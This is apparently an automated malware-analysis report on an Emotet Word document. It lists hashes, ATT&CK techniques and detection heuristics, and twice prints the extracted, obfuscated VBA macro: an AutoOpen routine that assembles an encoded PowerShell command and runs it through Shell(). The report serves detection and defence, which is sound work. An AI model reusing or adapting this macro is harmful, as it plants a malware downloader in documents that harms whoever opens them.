Emotet Office (OLE) malware analysis — malicious · 7ce5f1b4f65da0fa

MALICIOUS

Office (OLE)

92.9 KB Created: 2018-06-08 20:47:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: 98ca24a43469ea2aee27277b49dfb4d1 SHA-1: 7b61fdf17b1f38e8549085b7fdb48d967eb829a0 SHA-256: 7ce5f1b4f65da0fa930b66876fbdb16c1e8b45f03802780406371aa96ab46846

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6899214-0'. Static analysis reveals the presence of VBA macros, specifically an AutoOpen macro that utilizes the Shell() function. This indicates the document is designed to execute arbitrary commands, likely to download and run a secondary payload, a common Emotet distribution technique.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6899214-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6899214-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12519 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12519 bytes
SHA-256: `a73e5f7f56b9b6ca5300ddc9d33ca2961a935f0bccbc2c913cb8364fed73fe45`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "foNiJLsQr" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function fSODOmNMk() On Error Resume Next For qfbsO = aVEAE To QrZTPP For qLwNi = lEGdv To 86061 jBfuKJ = (1660 / CBool(wzFzE) - pjwOp / Oct(51823 / Hex(85569) / CrSsi + Rnd(QTrJIS / Fix(37)))) Next OLiIF = 28652 - 24599 Next For NtPipw = IPGRt To zocRb For mcGwp = PaUTFj To 23178 XowCOs = (63149 / CBool(LbCqZq) - XCqdr / Oct(49922 / Hex(34896) / wasZV + Rnd(oJWFN / Fix(37)))) Next KqaDiq = 88191 - 32405 Next fSODOmNMk = ivMiR + Shell(RGWiMLSrDPl + Chr(AiknkvBZ + vbKeyP + KwDLjItFSJJ) + "owers" + WBUzimvvWWf + HwHznw + NiSjqWaKi + SdkMMcMi + sMJKiRLCHEQ, 17641 - 17641) For uwMYLz = OGUFF To BcWSLq For RfkLA = jbnvA To 61731 cCbfB = (20271 / CBool(XvQkI) - dozjPf / Oct(6563 / Hex(88269) / OOAYG + Rnd(paKUZ / Fix(37)))) Next FzAqR = 1268 - 72813 Next End Function Sub Autoopen() On Error Resume Next For WPzDPb = iHfUcH To nNfcE For hUFQij = pzpzf To 33750 pwOzJf = (50508 / CBool(TiAww) - LnLpww / Oct(34425 / Hex(5079) / jViDC + Rnd(RipLNZ / Fix(37)))) Next wiSZMW = 1552 - 52369 Next fSODOmNMk For ljhdJ = IiScnp To bbbYiC For KljRXp = WXmvBi To 37475 wWZXmZ = (13339 / CBool(klzTGr) - orwiFz / Oct(125 / Hex(31548) / UBlLj + Rnd(lGLscF / Fix(37)))) Next HPWDtw = 60134 - 44708 Next End Sub Attribute VB_Name = "WiZzDDDOkw" Function WBUzimvvWWf() On Error Resume Next For PLBOYM = UkZGQ To YEKaR For bWAuj = kzKiPl To 53753 cpEQw = (56153 / CBool(jFzEz) - zTQlv / Oct(46621 / Hex(35294) / TPQRan + Rnd(ApUni / Fix(37)))) Next jjzui = 77618 - 16584 Next buSHckDu = "HeLL -e IAAuACg" + "AKABnAGUA" + "VAAtAFYAQQ" + "ByAEkAYQBiAEwAZ" + "QAgACcAKg" + "BtA" + "EQAcgAqACcA" + "KQAuAE4AYQBNAGU" + "AWwAzA" For RBqlfk = usUNJJ To ZnwWp For fPiQTz = jRrRj To 18717 COaju = (5755 / CBool(GwAZUA) - JLvIwS / Oct(30617 / Hex(2514) / aRfUu + Rnd(BCdzFF / Fix(37)))) Next NRbmF = 48193 - 37018 Next JZuFw = "CwAMQAxACwAMgBd" + "AC0ASgBvAGkA" + "bgAnACc" + "AKQAoAG4ARQ" For qzzpaF = JlrnBr To POiqd For zwUuVw = djMMqi To 87585 SjiUXF = (87587 / CBool(ISEUNC) - DPvXf / Oct(89211 / Hex(58565) / TcHSc + Rnd(iwTzQ / Fix(37)))) Next iEWFqE = 6539 - 23374 Next RwZzjtBObYt = "BX" + "AC0AT" + "wBiAEoARQBDAH" + "QAIABJAG8AL" + "gBDAG8AbQBwAF" + "IARQBTAHM" + "ASQ" + "BPAG4ALgBEAEUA" + "RgBMAEEAdABlAFM" For RdkbTI = vKOpnb To rPmQT For VkWwFi = sphbqS To 55661 wXqJQ = (62379 / CBool(JjbJG) - iqDnjh / Oct(12292 / Hex(62656) / oWpJF + Rnd(dmwVw / Fix(37)))) Next tsvHC = 95823 - 39025 Next MEdnBRO = "AVAB" + "yAEUAYQ" + "Bt" + "ACgAW" For mUvXFO = dnHkWV To iUUHbw For wdoIlk = HjhkmE To 40678 aRDqF = (99702 / CBool(rlbmDJ) - nuWXvp / Oct(82943 / Hex(14441) / UiCVH + Rnd(AkRVOt / Fix(37)))) Next Ekqfz = 73952 - 5927 Next zZcVBRX = "wBzAHk" + "AcwBUA" + "EUATQAu" + "AG" + "kAbwAu" + "AG0ARQBNAE8Acg" For zhnjsm = OIfcT To jMDir For krVhu = kqlhQr To 8997 iVwOo = (27992 / CBool(mWIpma) - VYnBF / Oct(41264 / Hex(35428) / dzswIv + Rnd(jsnXOT / Fix(37)))) Next Pppdd = 96028 - 40538 Next wcBwiNaWcV = "BZA" + "FMAdAByAEU" + "AYQBNAF0AWwB" + "DAG8AbgB2" + "AGUAUgBUAF0AOg" + "A6AEYAcgBvAE" + "0AYgBBAF" + "MARQA2ADQAcw" + "B0" For rIHjV = tOmjm To rzVpGs For pPBOL = HIwLcs To 39400 RHkrY = (50978 / CBool(niBoc) - WSTzX / Oct(70715 / Hex(75648) / zpuvCN + Rnd(vCJqR / Fix(37)))) Next Zplzh = 34241 - 91240 Next tNqcK = "AHIASQBOAEcA" + "KAAgACcAVgBaAE" + "QAYg" + "BUAHMASgBB" For lAZiH = qiMFHh To TRpwWM For sbrzL = wdiBp To 36481 dMpVMu = (55422 / CBool(QqEjk) - GXvBLE / Oct(69998 / Hex(18788) / IbXHo + Rnd(vKPop / Fix(37)))) Next HbUjb = 69432 - 94683 Next wpFzKRfMK = "AE" + "U ... (truncated)

SHA-256: a73e5f7f56b9b6ca5300ddc9d33ca2961a935f0bccbc2c913cb8364fed73fe45

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "foNiJLsQr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fSODOmNMk()
On Error Resume Next
For qfbsO = aVEAE To QrZTPP
      For qLwNi = lEGdv To 86061
         jBfuKJ = (1660 / CBool(wzFzE) - pjwOp / Oct(51823 / Hex(85569) / CrSsi + Rnd(QTrJIS / Fix(37))))
Next
   OLiIF = 28652 - 24599
Next
For NtPipw = IPGRt To zocRb
      For mcGwp = PaUTFj To 23178
         XowCOs = (63149 / CBool(LbCqZq) - XCqdr / Oct(49922 / Hex(34896) / wasZV + Rnd(oJWFN / Fix(37))))
Next
   KqaDiq = 88191 - 32405
Next
fSODOmNMk = ivMiR + Shell(RGWiMLSrDPl + Chr(AiknkvBZ + vbKeyP + KwDLjItFSJJ) + "owers" + WBUzimvvWWf + HwHznw + NiSjqWaKi + SdkMMcMi + sMJKiRLCHEQ, 17641 - 17641)
For uwMYLz = OGUFF To BcWSLq
      For RfkLA = jbnvA To 61731
         cCbfB = (20271 / CBool(XvQkI) - dozjPf / Oct(6563 / Hex(88269) / OOAYG + Rnd(paKUZ / Fix(37))))
Next
   FzAqR = 1268 - 72813
Next
End Function
Sub Autoopen()
On Error Resume Next
For WPzDPb = iHfUcH To nNfcE
      For hUFQij = pzpzf To 33750
         pwOzJf = (50508 / CBool(TiAww) - LnLpww / Oct(34425 / Hex(5079) / jViDC + Rnd(RipLNZ / Fix(37))))
Next
   wiSZMW = 1552 - 52369
Next
fSODOmNMk
For ljhdJ = IiScnp To bbbYiC
      For KljRXp = WXmvBi To 37475
         wWZXmZ = (13339 / CBool(klzTGr) - orwiFz / Oct(125 / Hex(31548) / UBlLj + Rnd(lGLscF / Fix(37))))
Next
   HPWDtw = 60134 - 44708
Next
End Sub


Attribute VB_Name = "WiZzDDDOkw"
Function WBUzimvvWWf()
On Error Resume Next
For PLBOYM = UkZGQ To YEKaR
      For bWAuj = kzKiPl To 53753
         cpEQw = (56153 / CBool(jFzEz) - zTQlv / Oct(46621 / Hex(35294) / TPQRan + Rnd(ApUni / Fix(37))))
Next
   jjzui = 77618 - 16584
Next
buSHckDu = "HeLL -e IAAuACg" + "AKABnAGUA" + "VAAtAFYAQQ" + "ByAEkAYQBiAEwAZ" + "QAgACcAKg" + "BtA" + "EQAcgAqACcA" + "KQAuAE4AYQBNAGU" + "AWwAzA"
For RBqlfk = usUNJJ To ZnwWp
      For fPiQTz = jRrRj To 18717
         COaju = (5755 / CBool(GwAZUA) - JLvIwS / Oct(30617 / Hex(2514) / aRfUu + Rnd(BCdzFF / Fix(37))))
Next
   NRbmF = 48193 - 37018
Next
JZuFw = "CwAMQAxACwAMgBd" + "AC0ASgBvAGkA" + "bgAnACc" + "AKQAoAG4ARQ"
For qzzpaF = JlrnBr To POiqd
      For zwUuVw = djMMqi To 87585
         SjiUXF = (87587 / CBool(ISEUNC) - DPvXf / Oct(89211 / Hex(58565) / TcHSc + Rnd(iwTzQ / Fix(37))))
Next
   iEWFqE = 6539 - 23374
Next
RwZzjtBObYt = "BX" + "AC0AT" + "wBiAEoARQBDAH" + "QAIABJAG8AL" + "gBDAG8AbQBwAF" + "IARQBTAHM" + "ASQ" + "BPAG4ALgBEAEUA" + "RgBMAEEAdABlAFM"
For RdkbTI = vKOpnb To rPmQT
      For VkWwFi = sphbqS To 55661
         wXqJQ = (62379 / CBool(JjbJG) - iqDnjh / Oct(12292 / Hex(62656) / oWpJF + Rnd(dmwVw / Fix(37))))
Next
   tsvHC = 95823 - 39025
Next
MEdnBRO = "AVAB" + "yAEUAYQ" + "Bt" + "ACgAW"
For mUvXFO = dnHkWV To iUUHbw
      For wdoIlk = HjhkmE To 40678
         aRDqF = (99702 / CBool(rlbmDJ) - nuWXvp / Oct(82943 / Hex(14441) / UiCVH + Rnd(AkRVOt / Fix(37))))
Next
   Ekqfz = 73952 - 5927
Next
zZcVBRX = "wBzAHk" + "AcwBUA" + "EUATQAu" + "AG" + "kAbwAu" + "AG0ARQBNAE8Acg"
For zhnjsm = OIfcT To jMDir
      For krVhu = kqlhQr To 8997
         iVwOo = (27992 / CBool(mWIpma) - VYnBF / Oct(41264 / Hex(35428) / dzswIv + Rnd(jsnXOT / Fix(37))))
Next
   Pppdd = 96028 - 40538
Next
wcBwiNaWcV = "BZA" + "FMAdAByAEU" + "AYQBNAF0AWwB" + "DAG8AbgB2" + "AGUAUgBUAF0AOg" + "A6AEYAcgBvAE" + "0AYgBBAF" + "MARQA2ADQAcw" + "B0"
For rIHjV = tOmjm To rzVpGs
      For pPBOL = HIwLcs To 39400
         RHkrY = (50978 / CBool(niBoc) - WSTzX / Oct(70715 / Hex(75648) / zpuvCN + Rnd(vCJqR / Fix(37))))
Next
   Zplzh = 34241 - 91240
Next
tNqcK = "AHIASQBOAEcA" + "KAAgACcAVgBaAE" + "QAYg" + "BUAHMASgBB"
For lAZiH = qiMFHh To TRpwWM
      For sbrzL = wdiBp To 36481
         dMpVMu = (55422 / CBool(QqEjk) - GXvBLE / Oct(69998 / Hex(18788) / IbXHo + Rnd(vKPop / Fix(37))))
Next
   HbUjb = 69432 - 94683
Next
wpFzKRfMK = "AE" + "U
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.